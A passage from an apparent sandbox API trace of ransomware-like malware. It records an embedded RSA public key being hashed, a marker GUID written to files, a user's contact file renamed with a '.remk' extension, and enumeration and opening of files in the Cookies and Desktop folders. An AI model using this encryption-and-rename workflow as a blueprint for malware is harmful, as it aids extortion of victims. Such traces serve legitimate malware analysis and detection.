KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.061] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.061] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.061] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0231.062] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.062] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.062] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.063] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.063] GetLastError () returned 0x0 [0231.063] SetLastError (dwErrCode=0x0) [0231.063] GetLastError () returned 0x0 [0231.063] SetLastError (dwErrCode=0x0) [0231.063] GetLastError () returned 0x0 [0231.063] SetLastError (dwErrCode=0x0) [0231.063] GetLastError () returned 0x0 [0231.063] SetLastError (dwErrCode=0x0) [0231.063] GetLastError () returned 0x0 [0231.063] SetLastError (dwErrCode=0x0) [0231.063] GetLastError () returned 0x0 [0231.063] SetLastError (dwErrCode=0x0) [0231.063] GetLastError () returned 0x0 [0231.063] SetLastError (dwErrCode=0x0) [0231.063] GetLastError () returned 0x0 [0231.063] SetLastError (dwErrCode=0x0) [0231.063] GetLastError () returned 0x0 [0231.063] SetLastError (dwErrCode=0x0) [0231.063] GetLastError () returned 0x0 [0231.063] SetLastError (dwErrCode=0x0) [0231.063] GetLastError () returned 0x0 [0231.064] SetLastError (dwErrCode=0x0) [0231.064] GetLastError () returned 0x0 [0231.064] SetLastError (dwErrCode=0x0) [0231.064] GetLastError () returned 0x0 [0231.064] SetLastError (dwErrCode=0x0) [0231.064] GetLastError () returned 0x0 [0231.064] SetLastError (dwErrCode=0x0) [0231.064] GetLastError () returned 0x0 [0231.064] SetLastError (dwErrCode=0x0) [0231.064] GetLastError () returned 0x0 [0231.064] SetLastError (dwErrCode=0x0) [0231.064] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.064] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0231.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0231.064] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.064] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.064] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x490) returned 0x325fb40 [0231.064] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0231.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0231.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0231.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325d6d0 [0231.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0231.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7538 [0231.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc80 [0231.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7580 [0231.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edbf0 [0231.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc68 [0231.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edce0 [0231.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc98 [0231.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0231.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x65dd10 [0231.065] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x65dd10, Size=0x218) returned 0x325d8d8 [0231.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b1b70 [0231.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc68 | out: hHeap=0x630000) returned 1 [0231.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc98 | out: hHeap=0x630000) returned 1 [0231.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edce0 | out: hHeap=0x630000) returned 1 [0231.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0231.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b70 | out: hHeap=0x630000) returned 1 [0231.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edce0 [0231.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0231.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edc98 [0231.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0231.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31edc68 [0231.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0231.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0231.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0231.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0231.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0231.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0231.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0231.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0231.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc98 | out: hHeap=0x630000) returned 1 [0231.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0231.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc68 | out: hHeap=0x630000) returned 1 [0231.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0231.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edce0 | out: hHeap=0x630000) returned 1 [0231.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0231.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0231.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d8d8 | out: hHeap=0x630000) returned 1 [0231.066] GetCurrentThreadId () returned 0x314 [0231.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0231.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x696ef8 [0231.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0231.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0231.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0231.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0231.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0231.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0231.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.067] GetCurrentThreadId () returned 0x314 [0231.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0231.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0231.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0231.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5968 [0231.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0231.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0231.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0231.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edce0 [0231.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0231.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0231.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0231.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0231.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0231.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0231.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0231.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc68 [0231.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0231.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0231.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0231.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0231.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0231.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc98 [0231.069] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x494, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.069] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.069] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.069] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.069] CloseHandle (hObject=0x640) returned 1 [0231.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0231.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b1b70 [0231.071] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.remk")) returned 1 [0231.073] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0 [0231.073] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0231.073] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0231.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5498 [0231.073] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0231.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0231.073] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0231.074] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="Cookies\\" [0231.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0231.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7580 [0231.074] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0231.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0231.074] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0231.074] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0231.074] PathFindFileNameW (pszPath="") returned="" [0231.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0231.074] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0xffffffff [0231.075] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0231.075] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5498 [0231.075] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0231.075] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0231.075] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0231.075] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0231.075] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0231.075] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7580 [0231.075] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0231.075] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0231.075] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0231.075] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0231.076] PathFindFileNameW (pszPath="") returned="" [0231.076] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0231.076] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac1c60, ftLastAccessTime.dwHighDateTime=0x1d5fd35, ftLastWriteTime.dwLowDateTime=0x4ac1c60, ftLastWriteTime.dwHighDateTime=0x1d5fd35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0231.076] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac1c60, ftLastAccessTime.dwHighDateTime=0x1d5fd35, ftLastWriteTime.dwLowDateTime=0x4ac1c60, ftLastWriteTime.dwHighDateTime=0x1d5fd35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0231.076] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3043410, ftCreationTime.dwHighDateTime=0x1d5de20, ftLastAccessTime.dwLowDateTime=0x5d31ea0, ftLastAccessTime.dwHighDateTime=0x1d5e146, ftLastWriteTime.dwLowDateTime=0x5d31ea0, ftLastWriteTime.dwHighDateTime=0x1d5e146, nFileSizeHigh=0x0, nFileSizeLow=0x144f6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-ZkT JS.bmp", cAlternateFileName="-ZKTJS~1.BMP")) returned 1 [0231.076] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0231.076] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x693330 [0231.076] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-ZkT JS.bmp") returned=".bmp" [0231.076] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-ZkT JS.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-zkt js.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.076] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=83190) returned 1 [0231.076] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.079] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x144d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.079] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.081] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x144f6, lpOverlapped=0x0) returned 1 [0231.083] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.083] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.083] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.083] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.084] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, 